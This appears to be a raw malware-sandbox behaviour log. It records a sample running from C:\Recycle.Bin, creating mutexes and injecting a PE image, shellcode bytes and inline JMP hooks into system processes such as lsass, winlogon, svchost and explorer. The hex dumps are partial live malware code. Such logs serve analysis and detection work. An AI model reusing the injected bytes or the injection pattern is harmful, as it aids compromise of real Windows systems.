C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00FFFFFF success or wait 1 18206B4
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 19E06B4
\BaseNamedObjects\Global\System64 success or wait 1 BAE0EF7
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BB60EF7
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe C:\Recycle.Bin\B6232F3AC2C.exe 0 success or wait 1 181033E
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2432 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1820639
1448 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 19E0639
1076 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
932 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
3448 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
3452 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
3896 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
3912 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
924 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
2196 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
2188 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F710B2
2192 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9266 1s success or wait 6 1810BFF
4214 0s success or wait 1242 BAED21A
8584 80s success or wait 1 1F71EFE
8594 540s no status 0 BAEBDC2
5192 -1s no status 0 BAF18D7
+ Thread terminated
TID PID Completion Count Source Address
2432 1636 success or wait 0 181096F
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
636 C:\WINDOWS\system32\winlogon.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
636 C:\WINDOWS\system32\winlogon.exe A30000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 5 E9 BF 33 12 84 success or wait 1 BAE2A6F
692 C:\WINDOWS\system32\lsass.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
692 C:\WINDOWS\system32\lsass.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
692 C:\WINDOWS\system32\lsass.exe 9B0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 5 E9 BF 33 0A 84 success or wait 1 BAE2A6F
892 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
892 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
892 C:\WINDOWS\system32\svchost.exe EB0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
892 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 5A 84 success or wait 1 BAE2A6F
968 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
968 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
968 C:\WINDOWS\system32\svchost.exe AF0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
968 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 1E 84 success or wait 1 BAE2A6F
1052 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1052 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1052 C:\WINDOWS\system32\svchost.exe 1A80000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1052 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 17 85 success or wait 1 BAE2A6F
1100 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1100 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1100 C:\WINDOWS\system32\svchost.exe 890000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1100 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 F8 83 success or wait 1 BAE2A6F
1144 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1144 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1144 C:\WINDOWS\system32\svchost.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1144 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1496 C:\WINDOWS\system32\spoolsv.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1496 C:\WINDOWS\system32\spoolsv.exe A40000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 5 E9 BF 33 13 84 success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe BB50000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 